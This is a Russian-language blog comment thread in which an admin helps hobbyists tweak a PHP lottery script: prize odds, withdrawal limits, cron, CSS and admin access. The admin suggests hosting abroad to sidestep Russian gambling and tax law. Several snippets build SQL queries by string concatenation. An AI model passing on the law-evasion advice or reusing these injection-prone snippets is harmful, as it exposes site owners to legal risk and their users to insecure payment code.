    Написано, что вывод совершен, но деньги остаются на счету.

  • 7788 сказал:

    Поставил два пробела в ссылку, чтоб письмо не исчезло

  • admin сказал:

    Эта ошибка возникает если выплачивать на один и тот же кошелек для любого проекта на выплату нужен отдельный кошелек с минимумом денег а тем более для этого где замечена накрутка.

  • сергей сказал:

    здравствуйте столкнулся с такой проблемой . в статистики мои рефералы
    время регистрации указывает на час вперед
    можно это исправить

  • admin сказал:

    приветствую сейчас посмотрю скорее всего где то часовой пояс установлен

  • admin сказал:

    В общем по поводу рефералов ищите файл /registr.php

    в нем вот такую строку
    $date=date(“d.m.Y H:i”);
    меняйте на такую
    $date=date(‘d.m.Y H:i:s’, strtotime(“-1 hours”));

  • сергей сказал:

    $date=date(‘d.m.Y H:i:s’, strtotime(«-1 hours»));
    меняю строку но нечего не получается
    белый экран что то наверно не так

  • admin сказал:

    белый экран это где то ошиблись вот файл целиком уже я поменял
    https://drive.google.com/open?id=1xZ7L-ZY_tIKu407WDf2pKZ1WVzlNvSkO

    И учитывайте что это только для новых рефералов те что уже есть нужно будет править в базе данных

  • сергей сказал:

    спасибо огромное все отлично работает

  • admin сказал:

    Всегда пожалуйста обращайтесь

  • сергей сказал:

    здравствуйте не магу понять где искать настройку выигрыша
    дело в том что после регистрации первый розыгрыш билета за 10 рублей
    не знаю почему но все время выигрыш 20 рублей
    как я не бился не магу найти где спряталась эта 20 где редактировать не знаю

    if($_GET[‘b’] == 10) {
    $rand[0] = 1;
    $rand[1] = 2;
    $rand[2] = 1;
    $rand[3] = 1;
    $rand[4] = 1;
    $rand[5] = 1;
    $rand[6] = 7;
    $rand[7] = 15;
    $rand[8] = 10;
    $rand[9] = 9;

    $rand2 = $rand[mt_rand(0,9)];
    if($rand2 > 15) $rand2 = $rand[mt_rand(0,9)];
    if($rand2 > 50) $rand2 = $rand[mt_rand(0,9)];

  • admin сказал:

    Обратите внимание на вот этот кусок не знаю почему у Вас 20 возможно фартит мне выдало 15 а вообще прописано от 10 до 20

    $resultPOS = mysql_query("SELECT * FROM stat_bilety WHERE login='".$_SESSION['login']."' AND tarif='10'",$db);
    if(mysql_num_rows($resultPOS ) < 1){ $randPOS[0] = 10 $randPOS[1] = 15 $randPOS[2] = 20 $rand2 = $randPOS[mt_rand(0,2)]

    Давайте расшифрую для ясности тут стоит условие
    if(mysql_num_rows($resultPOS ) < 1) То есть если $resultPOS меньше 1 то выдаст один из трех вариантов mt_rand(0,2) а $resultPOS это запись в базе данных таблица stat_bilety сортировка по login если записи нет то получаете либо 10 либо 15 либо 20

  • сергей сказал:

    да действительно спасибо за подсказку .
    подскажите пожалуйста как изменить процент
    от каждого купленного билета реферала. щас стоит 1% от внесенной суммы реферала
    как можно изменить на 10 %

  • сергей сказал:

    здравствуйте столкнулся с такой проблемой .
    сделал чтобы после регистрации на счету у пользователя была 10 рублей на покупку билета .
    Но и также появилась проблема эти 10 рублей можно сразу вывести.
    Можно сделать какую нибудь заглушку
    к примеру чтобы вывод работал после покупки первого билета

    при этом чтобы осталась минимальная сумма вывода от 1 рубля
    я ставил ограничение на вывод 11 рублей но это не то. выигрыш бывает 3 или 5 или 7
    хотелось чтоб пользователь получил первое впечатление и смог вывести первый выигрыш
    а не вывел сразу эти 10 рублей

  • сергей сказал:

    здравствуйте как столкнулся с такой проблемой .
    сделал чтобы после регистрации на счету у пользователя была 10 рублей на покупку билета .
    Но и также появилась проблема эти 10 рублей можно сразу вывести.
    Можно сделать какую нибудь заглушку
    к примеру чтобы вывод работал после покупки первого билета

    при этом чтобы осталась минимальная сумма вывода от 1 рубля
    я ставил ограничение на вывод 11 рублей но это не то. выигрыш бывает 3 или 5 или 7
    хотелось чтоб пользователь получил первое впечатление и смог вывести первый выигрыш
    а не вывел сразу эти 10 рублей

  • admin сказал:

    Проще всего конечно поднять минималку еще можно зацепится за реф деньги в принципе можно и за былеты зацепится если в таблице статистики нет записи то и выплат нет нужно подумать как это оформить

  • сергей сказал:

    буду рад любому варианту . жду с нетерпением
    наверно это сложная задача ❓

  • admin сказал:

    Задача не сложная но подумать надо сегодня уже не успею

  • сергей сказал:

    это понятно понедельник .но думаю как время у вас появиться посмотрите .

  • admin сказал:

    как время появится сделаю

  • sergei1783 сказал:

    здравствуйте не подскажите как сделать вывод от 10 копеек
    как я не пробовал нечего не выходит минималку можно сделать только 2 руб

    $_POST[‘money’] = stripslashes($_POST[‘money’]);
    $_POST[‘money’] = strip_tags($_POST[‘money’]);
    $_POST[‘money’] = htmlspecialchars($_POST[‘money’]);
    $_POST[‘money’] = mysql_real_escape_string($_POST[‘money’]);
    if($myrow[‘money’] < $_POST['money']){echo "”;exit();}
    if($_POST[‘money’] < 2.){echo "”;exit();}else{

  • sergei1783 сказал:

    ставлю меньше рубля выдает ошибку
    [0] => Sum should not be less than 1 RUB

    пробую вывести 1.10 все работает

  • admin сказал:

    Насколько я помню на паере меньше рубля выводить нельзя это спецыфика паера

  • сергей сказал:

    здравствуйте столкнулся с такой проблемой .
    сделал чтобы после регистрации на счету у пользователя была 10 рублей на покупку билета .
    Но и также появилась проблема эти 10 рублей можно сразу вывести.
    Можно сделать какую нибудь заглушку
    к примеру чтобы вывод работал после покупки билета

    при этом чтобы осталась минимальная сумма вывода от 1 рубля
    я ставил ограничение на вывод 11 рублей но это не то. выигрыш бывает 3 или 5 или 7
    хотелось чтоб пользователь получил первое впечатление и смог вывести первый выигрыш
    а не вывел сразу эти 10 рублей

  • admin сказал:

    приветствую я за это не забыл сделаю как только минута появится поднимите пока минимальную выплату

  • admin сказал:

    Пока опишу план действий прежде всего нужно будет добавить выиграшный счёт для этого в таблицу со счётом нужно будет добавить ещё одну строку money1 далее прописать в файле розыгрыша билетов добавление каждого выиграша в эту строку и напоследок добавить условие ограничивающее выплату без определенной суммы выиграша. Так же можно будет вывести статистику выиграшный если такой нету не помню. Все упирается во время сложного ничего нет но одной строчкой не отделаться. Хотел спросить а Вы решили вопрос с накруткой баланса ?

  • сергей сказал:

    после того как было установлина ограничения регистрации на кошелек .
    я сменил домен
    взломы прекратились правда я знал 3 засвеченных кошелька взломщика
    и вписал их сразу в базу данных
    я думаю именно это помогло . по крайне мере за последнее время взломов не было .

  • admin сказал:

    Имеется шанс что в процессе всех манипуляций дыра через которую сливали деньги закрылась. Но скорее всего злоумышленник ещё не видел этот домен создать новый кошелек большой проблемы нет. Думаю не будет лишним выплачивать деньги не с основного счета а с выиграшного всяко его создавать. Это усложнит задачу любителям не честной игры.

  • сергей сказал:

    отличная идея
    я так понимаю будет два счета для вывода выигрыша и для покупки билета
    но как это все устроить мне не понять . буду ждать ответа от вас .

  • admin сказал:

    Предлагаю продолжить на форуме тут выкладывать коды не возможно
    https://mexanus.ru/forum/topic/%d1%81%d0%ba%d1%80%d0%b8%d0%bf%d1%82-%d0%bb%d0%be%d1%82%d0%b5%d1%80%d0%b5%d0%b8/?part=1#postid-2944

  • Atikva сказал:

    Для Вас есть работа ( за вознаграждение в рублёвом эквиваленте).Ликвидировать уязвимости скрипта и изменить шаблон.

  • Atikva сказал:

    Для Вас есть работа ( за вознаграждение в рублёвом эквиваленте).Ликвидировать уязвимости скрипта и изменить шаблон

  • mexanus сказал:

    Если речь идёт о этом скрипте то боюсь я не помощник

  • Atikva сказал:

    Да ,об этом.Почему нет желания поработать

  • admin сказал:

    Скорее другое мы этот скрипт перебрали по винтикам и где дыра через которую сливают деньги я так и не нашел возможно ее удали но как теперь проверить человек у которого сливали сменил домен и я полагаю что злоумышленики еще его не нашли.

  • сергей сказал:

    этот скрипт сейчас сейчас у меня успешно работает наблюдаю давно после последних
    переделок этого скрипта огромное спасибо админу Mexanus взломов не было сам удивляюсь как так получилось но факт есть факт взломы прекратились
    вот собственно что получилось sprint-loterey. ru
    пробел после точки нужно убрать

  • admin сказал:

    Что взломов нет это еще не показатель конечно есть вероятность того что после всех наших манипуляций дыра через которую сливали закрылась. Но если я возьмусь за устранение уязвимостей в этом скрипте а окажется что вор просто выжидал то виноват будет уже не вор а виноват буду я. Стоит так же подметить что для меня это не работа а хобби и не хотелось бы лишних проклинаний в мой адрес если я окажусь прав и дыра никуда не делась.

  • сергей сказал:

    полностью с вами согласин я хочу сказать если так сильно надо Atikva этот скрипт он может сам повторить
    все манипуляции если внимательно
    читать все комментарии выше уже все готова все изменение записанные
    но дыра как вы сказали возможно некуда и не делась
    но взломов не было скрипт был установлен 117 дней назад. за это время нечего не случилось
    если взлом будет я обязательно напишу
    а пока сам наблюдаю

  • Atikva сказал:

    Этот скрипт, я буду использовать не как ЛОТЕРЕЮ (которая у нас в РФ) должна лицензироваться,да еще и в отдельно выделенных экономических зонах.
    Скрипт, будет носить строго идеологическую направленность.
    Пользователь будет покупать изображение.png Государственных казначейских билетов СССР 1961 г.выпуска.Изображение.png автоматически отсылается на почту,как факт совершенной покупки.
    А РОЗЫГРЫШ,- “комплиметн” за покупку,выражающийся ,либо в частичной компенсации цены покупки ,либо превышающей её.
    Ну в общем как-то так.
    Как ,можно загрузить файл изображения главной страницы моего сайта,к вам на блог.(для общего представления моего проекта)

  • mexanus сказал:

    Если автовыплаты не предусмотрены то проблема со сливом денег отпадает картинку проще всего показать через форум либо дать ссылку на нее блог ее не пропустит но я ее увижу и добавлю при модерации

  • Atikva сказал:

    Не могу скопировать полностью страницу сайта в .png,подскажите как это сделать

  • Atikva сказал:

    Кстати,кто можете помочь реализовать скрипт отсылки изображений на почту покупателя, после клика на кнопку КУПИТЬ.
    А то, я не могу реализовать свои “наполеоновские” планы.)))))

  • mexanus сказал:

    Скопировать картинку проще всего с помощью специальных программ лично я для таких дел использую pickpic что до отправки писем то стоит обратить внимание на файл восстановления пароля

  • Atikva сказал:

    К сожалению,я в этом плохо разбираюсь,за 30 лет все ,что знал забыл.
    Как реализовать это можно.Задача,что бы отправка происходила после нажатия на клавишу КУПИТЬ.

  • mexanus сказал:

    Нужно глянуть отвечу на этот вопрос как буду у компьютера

  • Atikva сказал:

    Спасибо за помощь,я Вас видимо загружаю своими проблемами,извините.

  • mexanus сказал:

    Да пока не за что для того я все это и затеял что бы помогать. Мне стало интересно Вы написали что за 30 лет все забыли боюсь то программирование что было тридцать лет назад сейчас уже не то. Я ещё помню что бы поиграть в тетрис нужно было пару часов в калькуляторе цыфры вводить. Вот были времена но сейчас все намного проще достаточно написать нужное в поиске.

  • Atikva сказал:

    Я начал преподавать детям программирование в 1987,а сейчас это для меня,полный мрак.
    Вот сейчас пытаюсь переместить кнопки регистрация,вход,выход,баланс.выигрыш,логин,пароль отдельной строкой меню.Она должна находиться ниже основной строки меню.Но мозг уже кипит,пора отдохнуть.

  • mexanus сказал:

    Вы пользуйтесь поиском активней там все есть напишите что то типа ориентация элементов на сайте. В 87 я только в школу пошел первый компьютер увидел в 90-х это был Поиск-1 верх совершенства игру змейку помню как что то сверхкосмическое.

  • Atikva сказал:

    А в начале 90х пошла “искра”с 10 мегабайтным винчестером,вот было-то радости))))))))))

  • admin сказал:

    теперь давайте по существу подробно опишите что должно быть отправлено и при каких обстоятельствах выигрыш проигрыш и тд

  • Atikva сказал:

    Извините я отходил.
    Когда клиент делает ставку,он кликает по “КУПИТЬ”.В папке-images3 находятся файлы купюры-3рубля_1_сторона.png и 3рубля_2_сторона.png ,которые сразу(в виде вложенных файлов) приходят с благодарственным письмом по поводу (за некую цену) покупки изображений Государственных казначейских билетов СССР на почту игрока.В папке будут находиться 6 купюр ,достоинством 3,5,10,25,50 и 100 руб.

  • Atikva сказал:

    Кстати придется вместо логина установить емайл при регистрации.Это как-то реализовал Сергей на своём лохотроне))))

  • Atikva сказал:

    Вот на выигрыш или на проигрыш ,это как-то я клиенту заспамлю всю почту.Может вывести отдельную кнопку “Забрать товар”.Надо подумать.Я бы не ломал себе и Вам голову,если бы не законы РФ

  • Atikva сказал:

    Может Вам будет проще работать ,если я солью Вам свой скрипт,он почищен от уязвимостей.

  • admin сказал:

    Скрипт не нужен уязвимости тут не играют роли насчет законов это интернет если разместить сайт на сервере который находится в другой стране то думаю можно не обращать внимание на законы что до кликает по Купить тут понятно буду думать где то я встречал что то подобное.

  • сергей сказал:

    вопрос к Atikva с чего вы вяли что у сергея лохотрон вы можете обосновать
    свое заявление вы хотите сказать что труды многих месяцев были для того чтобы
    замутить лохотрон это ваше личное мнение или у вас есть факт
    или вы это выдумали сами в чем лохотрон поясните пожалуйста

  • Atikva сказал:

    Вы меня извините,это просто вырвалось,глупое,необдуманное выражение)))Я могу только завидовать Вам,Вы добились своего.А мне еще предстоят долгие месяцы….
    Кстати,на днях получу новый скрипт лотереи “RED”.Принимайте участие в его “разборке”,может ,что и получится из него сделать.

  • Atikva сказал:

    admin,Я думаю,что все усложнил.Может напротив каждой купюры установить кнопку”забрать товар”,а при нажатии на кнопку”купить” она будет активирована и клиент скачивает самостоятельно.
    Даже если скрипт находится в другой стране,доступ к нему может быть заблокирован.Ко всему этому,еще и незаконная предпринимательская деятельность.

  • Atikva сказал:

    Сергей,я заходил на ваш сайт,мне он понравился.Если Вы выставите в открытый доступ этот скрипт,я не премину им воспользоваться.)))))

  • сергей сказал:

    Спасибо что ответили и пояснили удачи вам

  • admin сказал:

    Я все таки не понял не много логику проекта лотереи будут разыгрываться или нет или вы будете это делать в ручную. Насчет законов я не силен в законах Российской федерации так как не являюсь ее гражданином но думаю если сайт будет в другой стране то привлечь к ответственности его хозяина будет не просто его еще нужно узнать. Заблокировать возможно но подозреваю что по мелочам никто этого делать не будет. Посмотрите на все пирамиды хайпы и прочее сомнительно что все они работают законно и что бы кого то прикрыли именно из за нарушения законодательства еще не слышал. Да и из тех кому я помагал не один еще не говорил что бы оформлял все это дело по закону подозреваю там налоги не маленькие. Что до почты вполне осуществимо я полазил в сети и есть уже готовые решения изобретать велосипед не придется но одолевают меня сомнения что хостинги благосклонно относятся к рассылке писем одно дело если их будет десяток. Но всегда найдется негодяй который подключит какой нибудь автокликер и письма повалят потоком за это бан реальней получить чем за нарушения закона. Исходя из этого нужно хотя бы подключить какую нибудь каптчу либо брать деньги за каждый клик по кнопке второй вариант предпочтительней. Для этого скрипта слишком много переделок опишите подробно как Вы видите Ваш проект возможно есть смысл подобрать что то пофункциональней.

  • Atikva сказал:

    Вы счастливый человек,что не гражданин РФ.В России ,для подобной деятельности можно регистрироваться только в выделенных игровых зонах.Проекты закрывают на раз,а так же и находят ,для привлечения к Уголовной ответственности в зависимости от суммы незаконного обогащения.
    Теперь по проекту.
    Сам проект,задумывался в духе и времени СССР.А значит,что и дизайн будет идеологически “правильным”.Я отказался от автоматической рассылки писем.И предлогаю : Иыигрыш в виде денег,будет поступать как задумано автором скрипта,либо автоматом,либо(что предпочтительней ) в ручном режиме.А предмет купли-продажи-изображения купюр-в следующем режиме:
    Там ,где на скрипте происходит “ставка”,рядом с кнопкой”купить” показаны возможные суммы выиграша.Вот вместо них,расположить на против каждой купюры кнопку “забрать товар”,которая будет активироваться после нажатия на кнопку”купить”.И клиент скачивает из моей панки соответствующие купюры себе на комп. Наверное так будет проще всего

  • Atikva сказал:

    ВВиду того ,что вы живете не в РФ,подскажите,что нужно делать,что бы сайт индексировался и отображался на в зарубежных сетях

  • Atikva сказал:

    Кстати:а Вы не слышали,когда за лайки (в России),давали РЕАЛЬНЫЕ сроки заключения.

  • mexanus сказал:

    В общих чертах все понятно появляющуюся кнопку сделать проблем нет такая система используется практически во всех бонусниках после клика по рекламе появляется кнопка. Разместить все это там также не вызывает трудностей место позволяет. Что до скачивания купюр есть вопросы нужно что то придумывать что бы нельзя было скачать без появления кнопки но при наличии ссылки на купюру. Но это потом для начала разберемся с кнопками на выходных посмотрю. Обсуждение придётся перенести на форум так как в комментариях не получится выкладывать коды.

  • mexanus сказал:

    Из того что я слышал проблемы были только у тех кто не хорошо отзывался о власти что до индексации то поисковикам без разницы где находится сайт если контент уникальный то он будет показан везде.

  • Atikva сказал:

    Огромное спасибо за помощь,буду ждать на форуме.
    К сожалению,для меня этот проект не форма развлечения,а единственная возможность хоть какого-то заработка.в виду не возможности полноценно зарабатывать и передвигаться.Знаете ли старость приходит не всегда “счастливая”

  • mexanus сказал:

    Понимаю но учитывайте что бы заработать должно быть действительно что то уникальное и интересное я бы поступил проще без всей мороки со скриптами поскольку выхлоп не стоит ждать в ближайшее время. Возьмите движок типа ВордПресс и начните писать статьи думаю к старости есть что написать да продавайте ссылки со страниц а в свободное время делайте свой проект.

  • Atikva сказал:

    Спасибо,попробую и это

  • Atikva сказал:

    Основной статьёй моего проекта-будет “доска бесплатных объявлений”.Скрипты лото,будут размещаться на поддоменах основного дибо по ссылкам

  • admin сказал:

    не мое дело конечно но что бы на доске объявлений кто то что то оставлял нужно быть на первой странице поиска это еще тот геморой если нет денег. При достаточном финансировании все двери открыты. Не знаю есть ли у Вас сайт olx но они в свое время рекламировались на телевидение не могу знать сколько они потратили но это дало результат.

  • Atikva сказал:

    Спасибо за информацию,но я мыслю несколько мельче,чем olx.У нас только ленивый не открывает доски объявлений.По нашему району и то их хватает.
    Я думаю,что не нужно Вам ломать мозг,с моей просьбой.Я проанализировал ваши советы и буду запускать Loto -“как есть”.Единственно ,что не получается,это перенести из шапки сайта кнопки регистрации,вход,выход,окно ввода пароля и логина.
    Так что,будем жить проще.

  • Atikva сказал:

    Кстати,я так и не разобрался,почему при нажатии на “вход.выход”,строка “меню” меняет свою ширину и проскакивает белый экран.Такая же история и у Сергея.

  • Atikva сказал:

    Совсем забыл,при нажатии на” вывод средств” выдает такое сообщение :
    Array
    (
    [0] => Auth error: account or apiId or apiPass is incorrect or api-user was blocked
    )
    и на вкладке:- Вывод средств успешно произведен.

  • sergei1783 сказал:

    наверно это потому что два разных меню а вот почему белый экран некогда
    не вникал наверно так должно быть

  • Atikva сказал:

    Здравствуйте Сергей,”белого экрана” быть не должно.А вот меню,расширяется из-за текста(я так думаю).
    У меня так и не получилось установить окна Баланса и Выигрыша,как у Вас.Собственно ,мне бы их вовсе убрать .Сколько времени работает ваш сайт и как с трафиком обстоят дела.

  • sergei1783 сказал:

    сайт работает 119 дней но толку мало трафик 1-2 посетителя в сутки нужна солидная раскрутка реклама
    одно дело сайт установить подправить а другое дело где взять посетителя
    приходиться рекламировать на буксах всевозможными способами

  • admin сказал:

    Белый экран это всегда ошибка что до этого
    Auth error: account or apiId or apiPass is incorrect or api-user was blocked
    )
    то судя по тому что написано не правильно прописан пароль apiPass для выплат

  • admin сказал:

    По поводу меню так задумано создателем файл /css/zerkalo.css вот этих два фрагмента
    #menu {

    background: #03658e; /* цвет фона навигационной панели */

    text-align:center;

    }
    и при входе

    #div_header {
    margin: auto;
    height: 60px;
    width: 1075px;
    border: 1px solid #333333;
    background-color: #03658E;
    }
    то есть пока Вы не вошли работает первый стиль после входа второй

    Для облегчения работы с дизайном пользуйтесь возможностями браузера наводите на нужный элемент мышку и правой кнопкой в хроме Посмотреть код в мазиле Исследователь элемент в других браузерах так же есть что то подобное довольно удобно браузер покажет где менять искомое можно цвет размеры подобрать но менять все равно в файлах

  • Atikva сказал:

    admin Огромное спасибо,полезу изменять.

  • Atikva сказал:

    Может этот скрипт,ближе к оригиналу:
    http://платное-бесплатно.рф/threads/skript-bezproigryshnogo-loto.1241/

  • admin сказал:

    Скрипт скорее всего тот же просто другой дизайн

  • Atikva сказал:

    Привет Всем.
    Админ,скорее всего,тот скрипт который у меня и Сергея ,переделка с оригинала.
    Я сужу по ошибке в переходе на другую страницу.,меню(которое я пытаюсь привести в порядок).
    Лучше работать с исходником.

  • mexanus сказал:

    Приветствую все возможно что за ошибка?

  • Atikva сказал:

    Админ,Я все про переход страниц при нажатии на “вход”

  • admin сказал:

    Я бы на Вашем месте не обращал на это внимание сильно быстро все проходит не понятно ошибка это или быстродействие хостинга.

  • Atikva сказал:

    Admin:”быстродействие хостинга” отпадает,это происходит на локале.

  • mexanus сказал:

    Ну на хостинге тоже тяжело сказать чем это вызвано на хостинге в логах ошибок ничего нет

  • Atikva сказал:

    admin: Вот достался новый скрипт ежедневной лотереи.Сам справиться не могу,показывает ошибки и проблема с регистрацией.Короче,нужна работа специалиста.
    Куда можно Вам скинуть скрипт.

  • mexanus сказал:

    Слева под опросами есть контакты скрипт можно скинуть на почту

  • Atikva сказал:

    Admin:скрипт выслал

  • mexanus сказал:

    Вижу буду у компьютера посмотрю

  • admin сказал:

    В общем ошибки я убрал осталось проверить самое главное работает ли розыгрыш пока не вижу как ускорить что бы не ждать день
    Розыгрыш работает скидываю скрипт назад база подойдет от старого в ней ничего не менял

  • Atikva сказал:

    Огромное спасибо!! Расскажите почему проходили ошибки.
    Кстати ,я тоже думал о том как ,изменить частоту розыгрыша.Может подскажите.

  • Atikva сказал:

    Admin:Подскажите,в этом скрипте есть админка или её кто то выковырил)))Я пытаюсь войти но загружается начальная страница и нужно проводить регистрацию.

  • Atikva сказал:

    Кстати,в этом скрипте,до Вашего ремонта,переход страниц проходил через белый лист ,а сейчас перехода не видно.Как Вам удалось его реанимировать.Спасибо за доставленную радость)))))

  • admin сказал:

    Пожалуйста насчет ошибок я не изобретаю велосипед практически все они описаны и есть решение достаточно воспользоватся поиском пишете в поиск что Вам выдает ошибка и ищете решение именно так я и начинал понятное дело в начале это долго но со временем все запоминается. Что до этого скрипта самая первая ошибка выдавало ошибка 500 это практически всегда связано с файлом .htaccess это файл настроек сервера нужно было перед Options поставить # так же выскакивала ошибка связанная с заголовками тут пришлось и мне воспользоватся поиском и оказалось что проблема в кодировке как не странно потому что не выдавало иероглифов вся суть что нужно было перекодировать некоторые файлы в UTF-8 без BOM в ошибке как правило пишется с каким файлом проблема и в какой строке ошибка. Что до админки что бы перейти на страницу админки нужно войти под логином и паролем админа в базе данных можно глянуть что бы прописать себя админом нужно сменить в таблице t_users на своем аккаунте u_id на 301 либо если зайти с другой стороны то во всех файлах админки это папка m_admin сменить в этом выражении
    if(!USER_LOGGED || $u_id != 301)
    301 на свой u_id
    Что до частоты проведения лотереи я нашел где можно сдвинуть время розыгрыша то есть поставить что бы он был не в 12 а скажем в 8 и тд что бы сделать ее раз в час еще нужно разбиратся
    файл /actions/cron_play.php вот это выражение
    if (date(“G”) != 12 || date(“i”) > 01) exit;

    Кстати нужно настраивать крон я так понял без него работать не будет у меня на хостинге этот раздел называется Планировщик в инструкции что то есть но там с ошибкой возможно правда для разных серверов по разному но не суть у меня вот так
    1 1 * * * /usr/bin/wget -qO- http://test6.mexanus.ru/actions/cron_play.php

  • Atikva сказал:

    Здравствуйте,делаю ставки под админом ,но в розыгрыше они не участвуют.Счет списывается,статистика не показывает ,что были куплены билеты.
    По этой ссылке у меня белый экран.

  • admin сказал:

    Немного не понял что значит под админом поподробней и о какой ссылке речь если о той что в прошлом Коментарии то там и должен быть белый экран и это не ссылка а пример крона у Вас будет так
    1 1 * * * /usr/bin/wget -qO- http://Ваш сайт/actions/cron_play.php

  • Atikva сказал:

    Здравствуйте Admin,паро ссылку забудьте -это мое недопонимание предмета.
    Вот только с билетами я не могу разобраться,Я покупаю билеты ,войдя под логином iAdmin.Билеты отображаются на красной панельке с правой стороны,при наступлении розыгрыша в 12-00 билеты с панельки пропадают данных о розыгрыше нет.Может это из-за того,что я не подключил Cron.
    Поясните настройку Cron по подробнее,для меня это совсем непонятно.

  • Atikva сказал:

    С билетами разобрался,сам виноват полазил по настройкам OpenServer.
    Осталась проблема с настройкой крона и частотой розыгрыша.
    Кстати,как производятся выплаты.

  • mexanus сказал:

    Я не пользуюсь OpenServer не скажу есть ли там вообще крон это скорее для сервера нужно будет настраивать непосредственно на хостинге в частоту розыгрышей не вникал ещё как в выплаты не смотрел вообще но что в выплатах смущает. Думаю как везде подключаете апи на паере прописывание ключи и все.

  • Atikva сказал:

    Я сейчас полазил по скрипту и такое впечатление,что его собрали с разных проектов.Повыкидывал кучу ненужных картинок,теперь вес скрипта 4.80.Договор оферты,на какой-то хайп,полный кошмар.
    В целом идея скрипта устраивает.Убогая админка.Как выплачивать в ручном режиме выигрыши не разобрался.В договоре оферты сказано-
    1.Не создавать цепочки из 2-х и более следующих друг за другом регистраций с целью неоднократного получения реф. бонусов от каждой из оплат. В случае обнаружения таких цепочек, администрация имеет полное право удалить, заблокировать или оштрафовать пользователя. (то есть,отсутствует защита,как провести БАН пользователя,я не нашел)
    2.Рестарт системы:
    5.1 Система делает рестарт при ситуации, когда очередь становится слишком длинной и время от
    создания до получения вклада занимает более 10-и суток.
    5.2 При рестарте все вклады аннулируются, вложенные средства не сохраняются. (потеря вкладов,должна видимо к чему-то,стимулировать пользователей.
    Целый ряд странностей.

  • admin сказал:

    а я все вспоминаю где я файлы видел а вот теперь вспомнил в каком то хайпе и видел а если быть точнее то в Скрипт инвестиционной матрицы MLM BigTrush ну скорее всего не только в ней так что ничего удивительного я и сам переодически переделываю скрипты в основном фермы вот пример https://mexanus.ru/bonusplus

  • Atikva сказал:

    А еще я видев от скрипта лотереи “Победа”,надрали кусков

  • Atikva сказал:

    Забыл спросить,как можно увеличить количество билетов,судя по картинкам в images,их там заложено 5.
    А в каких файлах ини прописаны?

  • admin сказал:

    картинок 6 но в файлах только на три так просто не добавить нужна значительная переделка

  • Atikva сказал:

    Здравствуйте админ,согласен с вами.Провозился до 5 утра,а результат ,как вы и сказали.
    По стоимости билета и картинкам,прописано в файле cabinet/index.php/
    К сожалению результат нулевой.Где-то есть еще.
    Требуется Ваша любезная помощь.

  • Atikva сказал:

    Admin:Каково Ваше мнение насчет этого скрипта?У меня сложилось не важное мнение.
    Полагаю лучше доработать “скрипт беспроигрышной лотереи”,который Вы дорабатывали.
    Если у Вас есть желание ,выставите скрипт на Вашем сайте для людей,может кому и сгодится.

  • admin сказал:

    все оно делается было бы время

  • Atikva сказал:

    Сейчас убираю ошибки обнаруженные в скрипте(беспроигрышная лотерея) через Google Chrome-исследовать элемент.
    Показал огромное количество .
    Вот остались эти:
    Ошибка при парсинге значения «font-size». Потерянное объявление. loto.ru:17:21
    Незащищённая (http://) страница содержит поля для ввода пароля. Это представляет собой угрозу безопасности, которая позволяет украсть учетные данные для входа пользователя.
    Не подскажите как их убрать,мозг уже отключился.
    большинство ошибок было из-за лишнего пробела, типа – bo rder .

  • Atikva сказал:

    Забыл сказать,на главной странице под поворачивающимися купюрами,при наведении курсора,появились элипсы(по размеру купюр.Один белого цвета под купюрой и второй чёрного цвета под купюрой(как зеркальное отражение.Черные я удалил в CSS с помощью “исследовать элемент”,а белые не могу подцепить,вот какая гадость получилась после исправления ошибок.

  • mexanus сказал:

    Не защищенная страница это хром хочет что бы вы подключили сертификат ssl то есть что бы адрес был https на open server не знаю как такое провернуть что до элип ов тут бы глянуть на них могу посоветовать воспользоваться браузером мазилой там есть подобное исследовать элемент называется по другому и функционал отличается

  • Atikva сказал:

    Спасибо за совет,скрипт стал работать,убрал все элипсы.
    Из ошибок осталась одна,но на всех страницах-Ошибка при парсинге значения «font-size». Потерянное объявление.
    Может быть это тоже происки браузера и стоит о ней забыть

  • Atikva сказал:

    Из файлов удалил такие выражения с пробелом как-ra dius…..bo rder.
    Если пробел убрать ,а выражение оставить (типа как было задумано) появляются “элипсы”.
    Поэтому,рисковать не стал,а удалил все эти выражения с пробелом.
    Ну может,как нибудь попробую снова методично разобраться,хотя ,есть ли смысл,если и так работает.

  • Atikva сказал:

    Кстати,помните я был недоволен,что меняется ширина строки меню при нажатии на кнопку”вход”.
    Только что внес изменения в CSS и строки стали одинаковой ширины.
    Спасибо Вам,что надоумили методично разбираться,а пускать сопли при каждой проблеме.

  • Atikva сказал:

    Админ:Что-то не получается настроить bilety.php,ну не вижу логики в куче цифр.
    Может подскажите как настроить исходя из того,что стоимость билетов – 3 руб.,5,10,25,50,100
    Ну не получается ,хоть тресни.

  • sergei1783 сказал:

    здравствуйте возможно установить в статистику сайта
    пункт выплачено всего
    в данный момент стоит пункт последние выплаты
    тоись показывает последнею выплату
    а хотелось конечно чтобы сумма просто добавлялась
    в данный момент статистика выглядит так

    Пользователей
    Online
    Последний выигрыш
    Последний вывод

  • mexanus сказал:

    Приветствую возможно конечно на выходных гляну

  • Atikva сказал:

    Привет Admin,к сожалению долго отсутствовал.
    Хочу вернуться к проблеме настройки выплат в беспроигрышной лотереи.
    ” Админ:Что-то не получается настроить bilety.php,ну не вижу логики в куче цифр.
    Может подскажите как настроить исходя из того,что стоимость билетов – 3 руб.,5,10,25,50,100
    Ну не получается ,хоть тресни.”
    Вы не рассматривали этот вопрос,а то есть желание довести скрипт до логического конца.

  • admin сказал:

    Приветствую что именно Вас смущает в bilety.php

Добавить комментарий

You have to agree to the comment policy.

*

code

Этот сайт использует Akismet для борьбы со спамом. Узнайте как обрабатываются ваши данные комментариев.